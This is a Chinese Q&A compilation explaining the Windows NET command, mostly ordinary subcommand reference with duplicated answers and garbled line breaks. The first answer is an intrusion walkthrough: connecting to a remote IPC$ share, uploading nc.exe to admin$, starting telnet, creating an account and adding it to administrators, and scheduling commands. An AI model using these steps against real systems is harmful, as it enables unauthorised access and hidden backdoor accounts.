⑴ 怎样用netstart命令
net x0dx0ax0dx0a这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net/?回车如图6。 x0dx0ax0dx0a在这里,我们重点掌握几个入侵常用的子命令。 x0dx0ax0dx0anetview x0dx0ax0dx0a使用此命令查看远程主机的所以共享资源。命令格式为netview\\IP。如图7。 x0dx0ax0dx0anetuse x0dx0a把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为netusex:\\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(netuse\\IP\IPC$"password"/user:"name"),如图8。 x0dx0ax0dx0a建立了IPC$连接后,呵呵,就可以上传文件了:nc.exe\\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。 x0dx0ax0dx0anetstart x0dx0a使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:netstartservername,如图9,成功启动了telnet服务。 x0dx0ax0dx0anetstop x0dx0a入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和netstart同。 x0dx0ax0dx0anetuser x0dx0a查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的netuser,可以查看所有用户,包括已经禁用的。下面分别讲解。 x0dx0a1,netuserabcd1234/add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。 x0dx0a2,netuserabcd/del,将用户名为abcd的用户删除。 x0dx0a3,netuserabcd/active:no,将用户名为abcd的用户禁用。 x0dx0a4,netuserabcd/active:yes,激活用户名为abcd的用户。 x0dx0a5,netuserabcd,查看用户名为abcd的用户的情况,如图10。 x0dx0ax0dx0anetlocalgroup x0dx0a查看所有和用户组有关的信息和进行相关操作。键入不带参数的netlocalgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:/add,如图11。 x0dx0ax0dx0a现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用netuserabcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。 x0dx0ax0dx0anettime x0dx0a这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:nettime\\IP。
⑵ 哪位大虾能告诉我net命令最完全的用法,谢谢
(1)NET命令是一个命令行命令。 (2)管理网络环境、服务、用户、登陆。。。。等本地信息 (3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。 (4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。 (5)WORKSTATION和SERVER中的NET命令基本相同。 (6)获得HELP <1>在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET <2>在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法 相应的方 法的帮助NET COMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另对于错误 NET HELPMSG MESSAGE#是4位数 (7)强制参数 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是 预先给系统的 提问一个答案] (8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重 (9)对于NET命令的功能都可以找到相应的图形工具的解决方案 (10)命令的组成 命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。 瘰疬罗嗦说了一大堆,其实就是6和7有用,呵呵 另有两件事: (1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的 (2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用 下面对NET命令的不同参数的基本用法做一些初步的介绍: (1)NET VIEW 作 用:显示域列表、计算机列表或指定计算机的共享资源列表。 命令格式:net view [\\computername | /domain[:domainname]] 参数介绍: <1>键入不带参数的net view显示当前域的计算机列表。 <2>\\computername 指定要查看其共享资源的计算机。 <3>/domain[:domainname]指定要查看其可用计算机的域 简单事例 <1>net view \\YFANG查看YFANG的共享资源列表。 <2>net view /domain:LOVE查看LOVE域中的机器列表。 (2)NET USER 作 用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users 。 命令格式:net user [username [password | *] [options]] [/domain] 参数介绍: <1>键入不带参数的net user查看计算机上的用户帐号列表。 <2>username添加、删除、更改或查看用户帐号名。 <3>password为用户帐号分配或更改密码。 <4>*提示输入密码。 <5>/domain在计算机主域的主域控制器中执行操作。 简单事例: <1>net user yfang查看用户YFANG的信息 (3)NET USE 作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。 命令格式:net use [devicename | *] [\\computername\sharename[\volume]] [password | *]] [/user:[domainname\]username] [[/delete] | [/persistent:{yes | no}]] 参数介绍: 键入不带参数的net use列出网络连接。 devicename指定要连接到的资源名称或要断开的设备名称。 \\computername\sharename服务器及共享资源的名称。 password访问共享资源的密码。 *提示键入密码。 /user指定进行连接的另外一个用户。 domainname指定另一个域。 username指定登录的用户名。 /home将用户连接到其宿主目录 /delete取消指定网络连接。 /persistent控制永久网络连接的使用。 简单事例: <1>net use e: \\YFANG\TEMP将\\YFANG\TEMP目录建立为E盘 <2>net use e: \\YFANG\TEMP /delete断开连接 (4)NET TIME 作 用:使计算机的时钟与另一台计算机或域的时间同步。 命令格式:net time [\\computername | /domain[:name]] [/set] 参数介绍: <1>\\computername要检查或同步的服务器名。 <2>/domain[:name]指定要与其时间同步的域。 <3>/set使本计算机时钟与指定计算机或域的时钟同步。 下面的这4个参数是相关的,所以一起介绍 (5)Net Start 作 用:启动服务,或显示已启动服务的列表。 命令格式:net start service (6)Net Pause 作 用:暂停正在运行的服务。 命令格式:net pause service (7)Net Continue 作 用:重新激活挂起的服务。 命令格式:net continue service (8)NET STOP 作 用:停止 Windows NT 网络服务。 命令格式:net stop service 参数介绍:我们来看看这些服务都是什么 <1>alerter(警报) <2>client service for netware(Netware 客户端服务) <3>clipbook server(剪贴簿服务器) <4>computer browser(计算机浏览器) <5>directory replicator(目录复制器) <6>ftp publishing service (ftp )(ftp 发行服务) <7>lpdsvc <8>net logon(网络登录) <9>network dde网络 dde) <10>network dde dsdm(网络 dde dsdm) <11>network monitor agent(网络监控代理) <12>nt lm security support provider(NT LM 安全性支持提供) <13>ole(对象链接与嵌入) <14>remote access connection manager(远程访问连接管理器) <15>remote access isnsap service(远程访问 isnsap 服务) <16>remote access server(远程访问服务器) <17>remote procere call (rpc) locator(远程过程调用定位器) <18>remote procere call (rpc) service(远程过程调用服务) <19>schele(调度) <20>server(服务器) <21>simple tcp/ip services(简单 TCP/IP 服务) <22>snmp <23>spooler(后台打印程序) <24>tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具) <25>ups (26)workstation(工作站) <27>messenger(信使) <28>dhcp client <29>eventlog 以下这些SERVICE只能在NT SERVER上使用 << 1>>)file server for macintosh <<2>>gateway service for netware <<3>>microsoft dhcp server <<4>>print server for macintosh <<5>>remoteboot <<6>>windows internet name service (9)Net Statistics 作 用:显示本地工作站或服务器服务的统计记录。 命令格式:net statistics [workstation | server] 参数介绍: <1>键入不带参数的net statistics列出其统计信息可用的运行服务。 <2>workstation显示本地工作站服务的统计信息。 <3>server显示本地服务器服务的统计信息。 简单事例: <1>net statistics server | more显示服务器服务的统计信息 (10)Net Share 作 用:创建、删除或显示共享资源。 命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"] 参数介绍: <1>键入不带参数的net share显示本地计算机上所有共享资源的信息。 <2>sharename是共享资源的网络名称。 <3>drive:path指定共享目录的绝对路径。 <4>/users:number设置可同时访问共享资源的最大用户数。 <5>/unlimited不限制同时访问共享资源的用户数。 <6>/remark:"text "添加关于资源的注释,注释文字用引号引住。 简单事例: <1>net share mylove=c:\temp /remark:"my first share"以mylove为共享名共享 C:\temp <2>net share mylove /delete停止共享mylove目录 (11)Net Session 作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。 命令格式:net session [\\computername] [/delete] 参数介绍: <1>键入不带参数的net session显示所有与本地计算机的会话的信息。 <2>\\computername标识要列出或断开会话的计算机。 <3>/delete结束与\\computername计算机会话并关闭本次会话期间计算机的所有 ? 简单事例: <1>net session \\YFANG要显示计算机名为YFANG的客户端会话信息列表。 (12)Net Send 作 用:向网络的其他用户、计算机或通信名发送消息。 命令格式:net send {name | * | /domain[:name] | /users} message 参数介绍 : <1>name要接收发送消息的用户名、计算机名或通信名。 <2>*将消息发送到组中所有名称。 <3>/domain[:name]将消息发送到计算机域中的所有名称。 <4>/users将消息发送到与服务器连接的所有用户。 <5>message作为消息发送的文本。 简单事例: <1>net send /users server will shutdown in 5 minutes. 给所有连接到服务器 的用户发送消息 (13)Net Print 作 用:显示或控制打印作业及打印队列。 命令格式:net print [\\computername ] job# [/hold | /release | /delete] 参数介绍: <1>computername共享打印机队列的计算机名。 <2>sharename打印队列名称。 <3>job#在打印机队列中分配给打印作业的标识号。 <4>/hold使用 job# 时,在打印机队列中使打印作业等待。 <5>/release释放保留的打印作业。 <6>/delete从打印机队列中删除打印作业。 简单事例: <1>net print \\YFANG\SEEME列出\\YFANG计算机上SEEME打印机队列的目录 (14)Net Name 作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表 。 命令格式:net name [name [/add | /delete]] 参数介绍: <1>键入不带参数的net name列出当前使用的名称。 <2>name指定接收消息的名称。 <3>/add将名称添加到计算机中。 <4>/delete从计算机中删除名称。 (15)Net Localgroup 作 用:添加、显示或更改本地组。 命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain] 参数介绍: <1>键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。 <2>groupname要添加、扩充或删除的本地组名称。 <3>/comment: "text "为新建或现有组添加注释。 <4>/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作 ? <5>name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名 。 <6>/add将全局组名或用户名添加到本地组中。 <7>/delete从本地组中删除组名或用户名。 简单事例: <1>net localgroup love /add将名为love的本地组添加到本地用户帐号数据库 <2>net localgroup love显示love本地组中的用户 (16)Net Group 作 用:在 Windows NT Server 域中添加、显示或更改全局组。 命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain] 参数介绍: <1>键入不带参数的net group显示服务器名称及服务器的组名称。 <2>groupname要添加、扩展或删除的组。 <3>/comment:"text "为新建组或现有组添加注释。 <4>/domain在当前域的主域控 制器中执行该操作,否则在本地计算机上执行操作? <5>username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。 <6>/add添加组或在组中添加用户名。 <7>/delete删除组或从组中删除用户名。 简单事例: <1>net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本 地计算机的love组 (17)Net File 作 用:显示某服务器上所有打开的共享文件名及锁定文件数。 命令格式:net file [id [/close]] 参数介绍: <1>键入不带参数的net file获得服务器上打开文件的列表。 <2>id文件标识号。 <3>/close关闭打开的文件并释放锁定记录。 (18)Net Config 作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。 命令格式:net config [service [options]] 参数介绍: <1>键入不带参数的net config显示可配置服务的列表。 <2>service通过net config命令进行配置的服务(server或workstation) <3>options服务的特定选项。 (19)Net Computer 作 用:从域数据库中添加或删除计算机。 命令格式:net computer \\computername {/add | /del} 参数介绍: <1>\\computername指定要添加到域或从域中删除的计算机。 <2>/add将指定计算机添加到域。 <3>/del将指定计算机从域中删除。 简单事例: <1>net computer \\cc /add将计算机 cc 添加到登录域 (20)Net Accounts 作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。 命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen: length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw: number] [/domain] 参数介绍: <1>键入不带参数的net accounts显示当前密码设置、登录时限及域信息。 <2>/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时 <3>/minpwlen:length设置用户帐号密码的最少字符数。 <4>/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。 <5>/minpwage:days设置用户必须保持原密码的最小天数。 <6>/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。 <7>/domain在当前域的主域控制器上执行该操作。 <8>/sync当用于主域控制器时 ,该命令使域中所有备份域控制器同步 简单事例: <1>net accounts /minpwlen:7 将用户帐号密码的最少字符数设置为7 ----------------------上面介绍的是NET命令在WINNT下的基本用法 ----------------------下面我们看看NET命令在WIN98下的基本用法 在WIN98中NET命令也有一些参数 其中有一些参数的名字和功能及简单的使用方法 和WINNT下的相应的参数的用法相同 其中有 (1)NET TIME命令 (2)NET PRINT命令 (3)NET USE命令 (4)NET VIEW命令 在WIN98中NET命令有一些参数 其中有一些参数的名字和WINNT下的相应的参数的名 字相同但其用法却有些不同 其中有 (1)NET START 作 用:启动相应的服务。(不能在DOS-WIN中用) 命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK] [/LIST] [/YES] [/VERBOSE] (2)NET STOP 作 用:停止相应的服务.(不能在DOS-WIN中用) 命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES] 在WIN98中NET命令还有一些参数是在98下才有的 其中有 (1)NET DIAG 作 用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息 命令格式:NET DIAGNOSTICS [/NAMES | /STATUS] (2)NET INIT 作 用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用) 命令格式:NET INITIALIZE [/DYNAMIC] (3)NET LOGOFF 作 用:断开连接的共享资源(不能在DOS-WIN中用) (4)NET LOGON 作 用:在WORKGROUP中登陆(不能在DOS-WIN中用) 命令格式:NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO] (5)NET PASSWORD 作 用:更改你的网络登陆口令(不能在DOS-WIN中用) 命令格式:NET PASSWORD \\computer | /DOMAIN:name [user [oldpassword [newpassword]]]
⑶ 计算机的“NETUSE”命令怎么用
用于将计算机与共享的资源相连接(建立磁盘映射),或者切断计算机与共享资源的连接(删除磁盘映射),当不带选项使用本命令时,它会列出计算机的连接。
NETUSE
[devicename|*][\\computername\sharename[\volume][password|*]]
[/USER:[domainname\]username]
[/USER:[dotteddomainname\]username]
[/USER:[username@dotteddomainname]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE]|[/PERSISTENT:{YES|NO}]]
NETUSE{devicename|*}[password|*]/HOME
NETUSE[/PERSISTENT:{YES|NO}]
devicename指定一个名字以便与资源相连接,或者指定要切断的设备。
有两种类型的设备名:磁盘驱动器(D:至Z:)和打印机
(LPT1:至LPT3:)。输入一个星号来代替一个指定的设备
名可以分配下一个可用设备名。
\\computername指控制共享资源的计算机的名字。如果计算机名中包含有
空字符,就要将双反斜线(\\)和计算机名一起用引号
("")括起来。计算机名可以有1到15个字符。
\sharename指共享资源的网络名字。
\volume指定一个服务器上的NetWare卷。用户必须安装Netware
的客户服务(Windows工作站)或者Netware的网关服务
(Windows服务器)并使之与NetWare服务器相连。
password指访问共享资源所需要的密码。
*进行密码提示。当在密码提示符下输入密码时,密码不会显示。
/USER指定连接时的一个不同的用户名。
domainname指定另外一个域。如果缺省域,就会使用当前登录的域。
username指定登录的用户名。
/SMARTCARD指定连接使用在智能卡上的凭据。
/SAVECRED指定保留用户名和密码。此开关被忽略,除非命令提示输入用
户名和密码。
/HOME将用户与他们的主目录相连。
/DELETE取消一个网络连接,并且从永久连接列表中删除该连接。
/PERSISTENT控制对永久网络连接的使用。其默认值是最近使用的设置。
YES在连接产生时保存它们,并在下次登录时恢复它们。
NO不保存正在产生的连接或后续的连接;现有的连接将在下次登
录时恢复。可以使用/DELETE选项开关来删除永久连接。
⑷ NET命令大全
方法/步骤
net accounts
功能:将用户账户数据库升级并修改所有账户的密码和登录等。
格式:net accounts [/forcelogoff:{minutes|no}][/minpwlen:length][/maxpwage:{day|unlimited}][/minpwage:days][/uniquepw:number][/sync][/domain]
参数:输入不带参数的net accounts命令,显示密码、登录限制和域信息的当前配置
net computer
功能:从域数据库中添加或删除计算机,所有计算机的添加和删除都会转发到主域控制器。
格式:net computer\\computername{/add|/del}
net config
功能:显示当前运行的可配置服务,或显示并更改某服务的设置。
格式:net config[service][options]
参数:输入不带参数的net config 命令显示可配置服务的列表
net config workstation
功能:显示更改可配置工作站服务参数。更改立即生效,并且永久保持。并非所有的工作站服务参数都能使用 net config workstation 命令进行更改,其他参数可以在配置注册表时修改。
格式:net config workstation[/charcount:bytes][/charime:msec][/charwait:sec]
参数:输入不带参数的net config workstation 命令显示本地计算机的当前配置
net continue
功能:重新激活挂起的服务。
格式:net continue service
net file
功能;显示某服务器上所有打开得共享文件名及锁定文件数。该命令也可以关闭个别文件并取消文件锁定。
格式:net file [id[/close]]
参数:输入不带参数的net file 可获得服务器上打开文件的列表
net group
功能:在windows NT Server 域中添加、显示或更改全局组。
格式:net group [groupname[/comment:"text"]][/domain]
net group groupname{/add[comment:"Text"]|/delete}[/domain]
net group groupname username[...]{/add|/delete}[/domain]
net help
功能:提供网络命令列表及帮助主题,或提供指定命令或主题的帮助。
格式:net help[command]
net command {/help|/?}
参数:输入不带参数的net help 显示能够获得帮助的命令列表和帮助主题。
net Localgroup
功能:添加、显示或更改本地组
参数:输入不带参数的net localgroup 将显示服务器名称和计算机的本地组名称
net helpmsg
功能:提供Windows NT 错误信息的帮助。
格式:net helpmsg message#
参数:message#为需要其帮助的Windows NT 消息的四位代码。
⑸ net命令的使用,详细点,
这篇文章综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释,希望可以全面一些
先说一些:
(1)NET命令是一个命令行命令。
(2)管理网络环境、服务、用户、登陆。。。。等本地信息
(3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。
(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。
(5)WORKSTATION和SERVER中的NET命令基本相同。
(6)获得HELP
(1)在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET
(2)在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法,相应的方法的帮助NET COMMAND /HELP或NET HELP COMMAND或NET COMMAND /? 另对于错误NET HELPMSG MESSAGE#是4位数
(7)强制参数
所有net命令接受选项/yes和/no(可缩写为/y和/n)。〔简单的说就是预先给系统的提问一个答案〕
(8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重
(9)对于NET命令的功能都可以找到相应的图形工具的解决方案
(10)命令的组成
命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。
瘰疬罗嗦说了一大堆,其实就是6和7有用,呵呵
另有两件事:
(1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的
(2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用
下面对NET命令的不同参数的基本用法做一些初步的介绍:
(1)NET VIEW
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式:net view 〔computername | /domain〔:domainname〕〕
参数介绍:(1)键入不带参数的net view显示当前域的计算机列表。
(2)computername 指定要查看其共享资源的计算机。
(3)/domain〔:domainname〕指定要查看其可用计算机的域。
简单事例:(1)net view YFANG查看YFANG的共享资源列表。
(2)net view /domain:LOVE查看LOVE域中的机器列表。
(2)NET USER
作用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。
命令格式:net user 〔username 〔password | *〕 〔options〕〕 〔/domain〕
参数介绍:(1)键入不带参数的net user查看计算机上的用户帐号列表。
2)username添加、删除、更改或查看用户帐号名。
(3)password为用户帐号分配或更改密码。
(4)*提示输入密码。
(5)/domain在计算机主域的主域控制器中执行操作。
简单事例:(1)net user yfang查看用户YFANG的信息
(3)NET USE
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
命令格式:net use 〔devicename | *〕 〔computernamesharename〔volume〕〕 〔password | *〕〕 〔/user:〔domainname〕username〕 〔〔/delete〕 | 〔/persistent:{yes | no}〕〕
参数介绍:
键入不带参数的net use列出网络连接。
devicename指定要连接到的资源名称或要断开的设备名称。
computernamesharename服务器及共享资源的名称。
password访问共享资源的密码。
*提示键入密码。
/user指定进行连接的另外一个用户。
domainname指定另一个域。
username指定登录的用户名。
/home将用户连接到其宿主目录。
/delete取消指定网络连接。
/persistent控制永久网络连接的使用。
简单事例:
(1)net use e: YFANGTEMP将YFANGTEMP目录建立为E盘
(2)net use e: YFANGTEMP /delete断开连接
(4)NET TIME
作 用:使计算机的时钟与另一台计算机或域的时间同步。
命令格式:net time 〔computername | /domain〔:name〕〕 〔/set〕
参数介绍:
(1)computername要检查或同步的服务器名。
(6)Net Pause
作 用:暂停正在运行的服务。
命令格式:net pause service
(7)Net Continue
作 用:重新激活挂起的服务。
命令格式:net continue service
(8)NET STOP
作 用:停止 Windows NT 网络服务。
命令格式:net stop service
参数介绍:我们来看看这些服务都是什么
(1)alerter(警报)
(2)client service for netware(Netware 客户端服务)
(3)clipbook server(剪贴簿服务器)
(4)computer browser(计算机浏览器)
(5)directory replicator(目录复制器)
(6)ftp publishing service (ftp )(ftp 发行服务)
(7)lpdsvc
(8)net logon(网络登录)
(9)network dde(网络 dde)
(10)network dde dsdm(网络 dde dsdm)
(11)network monitor agent(网络监控代理)
(12)nt lm security support provider(NT LM 安全性支持提供)
(13)ole(对象链接与嵌入)
(14)remote access connection manager(远程访问连接管理器)
(15)remote access isnsap service(远程访问 isnsap 服务)
(16)remote access server(远程访问服务器)
(17)remote procere call (rpc) locator(远程过程调用定位器)
(18)remote procere call (rpc) service(远程过程调用服务)
(19)schele(调度)
(20)server(服务器)
(21)simple tcp/ip services(简单 TCP/IP 服务)
(22)snmp
(23)spooler(后台打印程序)
(24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)
(25)ups
26)workstation(工作站)
(27)messenger(信使)
(28)dhcp client
(29)eventlog
以下这些SERVICE只能在NT SERVER上使用
(1)file server for macintosh
(2)gateway service for netware
(3)microsoft dhcp server
(4)print server for macintosh
(5)remoteboot
(6)windows internet name service
(9)Net Statistics
作 用:显示本地工作站或服务器服务的统计记录。
命令格式:net statistics 〔workstation | server〕
参数介绍:(1)键入不带参数的net
statistics列出其统计信息可用的运行服务。
(2)workstation显示本地工作站服务的统计信息。
(3)server显示本地服务器服务的统计信息。
简单事例:(1)net statistics server | more显示服务器服务的统计信息
(10)Net Share
作 用:创建、删除或显示共享资源。
命令格式:net share sharename=drive:path 〔/users:number | /unlimited〕 〔/remark:text〕
参数介绍:(1)键入不带参数的net
share显示本地计算机上所有共享资源的信息。
(2)sharename是共享资源的网络名称。
(3)drive:path指定共享目录的绝对路径。
(4)/users:number设置可同时访问共享资源的最大用户数。
(5)/unlimited不限制同时访问共享资源的用户数。
(6)/remark:text 添加关于资源的注释,注释文字用引号引住。
简单事例:(1)net share mylove=c:temp /remark:my first
share以mylove为共享名共享C:temp
(2)net share mylove /delete停止共享mylove目录
11)Net Session
作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。
命令格式:net session 〔computername〕 〔/delete〕
参数介绍:(1)键入不带参数的net
session显示所有与本地计算机的会话的信息。
(2)computername标识要列出或断开会话的计算机。
(3)/delete结束与computername计算机会话并关闭本次会话期间计算机的所有进程。
简单事例:(1)net session YFANG要显示计算机名为YFANG的客户端会话信息列表。
(12)Net Send
作 用:向网络的其他用户、计算机或通信名发送消息。
命令格式:net send {name | * | /domain〔:name〕 | /users} message
参数介绍:(1)name要接收发送消息的用户名、计算机名或通信名。
(2)*将消息发送到组中所有名称。
(3)/domain〔:name〕将消息发送到计算机域中的所有名称。
(4)/users将消息发送到与服务器连接的所有用户。
(5)message作为消息发送的文本。
简单事例:(1)net send /users server will shutdown in 5 minutes.给所有连接到服务器的用户发送消息
(13)Net Print
作 用:显示或控制打印作业及打印队列。
命令格式:net print 〔computername 〕 job# 〔/hold | /release | /delete〕
参数介绍:(1)computername共享打印机队列的计算机名。
(2)sharename打印队列名称。
(3)job#在打印机队列中分配给打印作业的标识号。
(4)/hold使用 job# 时,在打印机队列中使打印作业等待。
(5)/release释放保留的打印作业。
(6)/delete从打印机队列中删除打印作业。
单事例:(1)net print YFANGSEEME列出YFANG计算机上SEEME打印机队列的目录
(14)Net Name
作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。
命令格式:net name 〔name 〔/add | /delete〕〕
参数介绍:(1)键入不带参数的net name列出当前使用的名称。
(2)name指定接收消息的名称。
(3)/add将名称添加到计算机中。
(4)/delete从计算机中删除名称。
(15)Net Localgroup
作 用:添加、显示或更改本地组。
命令格式:net localgroup groupname {/add 〔/comment:text 〕 | /delete} 〔/domain〕
参数介绍:(1)键入不带参数的net
localgroup显示服务器名称和计算机的本地组名称。
(2)groupname要添加、扩充或删除的本地组名称。
(3)/comment: text 为新建或现有组添加注释。
(4)/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作?
(5)name 〔 ...〕列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。
(6)/add将全局组名或用户名添加到本地组中。
(7)/delete从本地组中删除组名或用户名。
简单事例:(1)net localgroup love /add将名为love的本地组添加到本地用户帐号数据库
(2)net localgroup love显示love本地组中的用户
(16)Net Group
作 用:在 Windows NT Server 域中添加、显示或更改全局组。
命令格式:net group groupname {/add 〔/comment:text 〕 | /delete} 〔/domain〕
参数介绍:(1)键入不带参数的net group显示服务器名称及服务器的组名称。
(2)groupname要添加、扩展或删除的组。
(3)/comment:text 为新建组或现有组添加注释。
(4)/domain在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作? ?
(5)username〔 ...〕列表显示要添加到组或从组中删除的一个或多个用户。
(6)/add添加组或在组中添加用户名。
(7)/delete删除组或从组中删除用户名。
简单事例:(1)net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组
(17)Net File
作 用:显示某服务器上所有打开的共享文件名及锁定文件数。
命令格式:net file 〔id 〔/close〕〕
参数介绍:(1)键入不带参数的net file获得服务器上打开文件的列表。
(2)id文件标识号。
(3)/close关闭打开的文件并释放锁定记录。
(18)Net Config
作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。
命令格式:net config 〔service 〔options〕〕
参数介绍:(1)键入不带参数的net config显示可配置服务的列表。
(2)service通过net config命令进行配置的服务(server或workstation)
(3)options服务的特定选项。
(19)Net Computer
作 用:从域数据库中添加或删除计算机。
命令格式:net computer computername {/add | / del}
参数介绍:(1)computername指定要添加到域或从域中删除的计算机。
(2)/add将指定计算机添加到域。
(3)/del将指定计算机从域中删除。
简单事例:(1)net computer cc /add将计算机 cc 添加到登录域
(20)Net Accounts
作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。
命令格式:net accounts 〔/forcelogoff:{minutes | no}〕 〔/minpwlen:length〕 〔/maxpwage:{days | unlimited}〕 〔/minpwage:days〕 〔/uniquepw:number〕 〔/domain〕
参数介绍:(1)键入不带参数的net
accounts显示当前密码设置、登录时限及域信息。
(2)/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时
(3)/minpwlen:length设置用户帐号密码的最少字符数。
(4)/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。
(5)/minpwage:days设置用户必须保持原密码的最小天数。
(6)/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。
(7)/domain在当前域的主域控制器上执行该操作
8)/sync当用于主域控制器时,该命令使域中所有备份域控制器同步
简单事例:(1)net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7
----------------------上面介绍的是NET命令在WINNT下的基本用法
----------------------下面我们看看NET命令在WIN98下的基本用法
在WIN98中NET命令也有一些参数
其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相? ?
其中有(1)NET TIME命令
(1)NET PRINT命令
(1)NET USE命令
(1)NET VIEW命令
在WIN98中NET命令有一些参数
其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同
其中有
(1)NET START
作 用:启动相应的服务。(不能在DOS-WIN中用)
命令格式:NET START 〔BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK〕 〔/LIST〕 〔/YES〕 〔/VERBOSE〕
(2)NET STOP
作 用:停止相应的服务.(不能在DOS-WIN中用)
命令格式:NET STOP 〔BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK〕 〔/YES〕
在WIN98中NET命令还有一些参数是在98下才有的
其中有
(1)NET DIAG
作 用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息
命令格式:NET DIAGNOSTICS 〔/NAMES | /STATUS〕
(2)NET INIT
作 用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)
命令格式:NET INITIALIZE 〔/DYNAMIC〕
(3)NET LOGOFF
作 用:断开连接的共享资源(不能在DOS-WIN中用)
(4)NET LOGON
作 用:在WORKGROUP中登陆(不能在DOS-WIN中用)
命令格式:NET LOGON 〔user 〔password | ?〕〕 〔/DOMAIN:name〕 〔/YES〕 〔/SAVEPW:NO〕
(5)NET PASSWORD
作 用:更改你的网络登陆口令(不能在DOS-WIN中用)
